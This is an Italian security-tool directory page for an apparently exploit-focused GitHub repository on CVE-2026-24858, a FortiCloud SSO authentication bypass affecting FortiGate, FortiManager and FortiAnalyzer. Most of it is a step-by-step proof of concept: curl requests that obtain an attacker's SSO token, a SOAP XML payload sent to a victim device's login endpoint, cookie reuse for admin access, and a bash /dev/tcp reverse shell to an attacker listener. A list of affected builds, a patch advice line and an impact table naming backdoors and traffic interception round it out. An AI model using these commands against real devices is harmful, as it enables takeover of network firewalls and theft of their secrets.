Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass — CVE-2026-24858 FortiCloud Single Sign On (SSO) — una funzionalità abilitata per impostazione predefinita in fabbrica una volta registrati FortiGate/FortiManager/FortiAnalyzer — contiene una vulnerabilità critica di bypass dell'autenticazione. | Kitploit
Strumenti/GitHubGitHub/absholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneRed Teaming
GitHubabsholi7ly/cve-2026-24858-forticloud-sso-authentication-bypass

CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass

CVE-2026-24858 FortiCloud Single Sign On (SSO) — una funzionalità abilitata per impostazione predefinita in fabbrica una volta registrati FortiGate/FortiManager/FortiAnalyzer — contiene una vulnerabilità critica di bypass dell'autenticazione.

Vedi Repository
956 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24858 | Bypass dell'autenticazione SSO FortiCloud


Riepilogo esecutivo

FortiCloud Single-Sign-On (SSO), una funzionalità abilitata di default in fabbrica una volta registrato qualsiasi FortiGate/FortiManager/FortiAnalyzer, contiene una vulnerabilità critica di bypass dell'autenticazione.

Un attaccante che possiede un qualsiasi account FortiCloud (gratuito o a pagamento) può riutilizzare il proprio token SSO per accedere agli apparati di altri clienti (≤ build elencate di seguito) senza conoscerne le password.

La post-esplorazione garantisce pieno accesso admin alla GUI e shell root, consentendo l'intercettazione del traffico, la manomissione della VPN o il movimento laterale nelle reti interne.

Aggiornare immediatamente o disabilitare FortiCloud SSO fino alla correzione.


Build interessate

ProdottoFirmware vulnerabileCorretto
FortiOS7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6
FortiManager7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9stessa major.minor+1
FortiAnalyzerstessi intervallistessa

PoC

  1. Macchina dell'attaccante
    Listener per la reverse shell:

    root@kitploit:~
    nc -lvnp 4444
    
  2. Ottenere il token dell'attaccante (TTL 15 min)

    root@kitploit:~
    curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
      -H "Content-Type: application/json" \
      -d '{"username":"[email protected]","password":"AttackerPass123"}'
    

    Risposta (estratto):

    root@kitploit:~
    {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
    

    Copiare il valore di access_token.

  3. Costruire il payload di bypass
    Salvare come bypass.xml:

    root@kitploit:~
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Body>
        <authRequest>
          <serialNumber>FGT80ETK21000000</serialNumber>
          <token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
          <action>login</action>
        </authRequest>
      </soapenv:Body>
    </soapenv:Envelope>
    
  4. Inviare alla vittima (qualsiasi firmware ≤ tabella sopra)

    root@kitploit:~
    curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
      -H "Content-Type: application/xml" \
      --data @bypass.xml \
      -c cookies.txt
    

    HTTP 200 + Set-Cookie: APSCOOKIE=... → successo.

  5. Navigare nella GUI admin
    Aprire il browser o usare curl con il cookie salvato:

    root@kitploit:~
    curl -k -b cookies.txt https://<VICTIM-IP>/ng/
    

    → Appare la Dashboard, nessuna password richiesta.

  6. Shell root (widget CLI)
    Nella GUI: Dashboard → CLI Console

    root@kitploit:~
    execute bash
    bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
    

    Il listener riceve:

    root@kitploit:~
    root@FGT80ETK21000000:/#
    

Impatto

ScenarioRisultato
Admin sola letturaEsportare l'intera configurazione (segreti VPN, policy local-in, hash utenti).
Admin scritturaModificare le regole firewall, creare utenti locali, disabilitare il logging, impiantare script persistenti.
Shell rootEstrarre config.dat, recuperare le chiavi HA, pivot verso sottoreti interne, impiantare servizio backdoor.
Movimento lateraleIl dispositivo diventa punto d'appoggio; VLAN e tunnel SSL-VPN considerati affidabili → violazione più profonda della rete.
Esfiltrazione datiTutto il traffico passa attraverso il FortiGate → proxy trasparente + iniezione di certificati.
Scarica lo strumento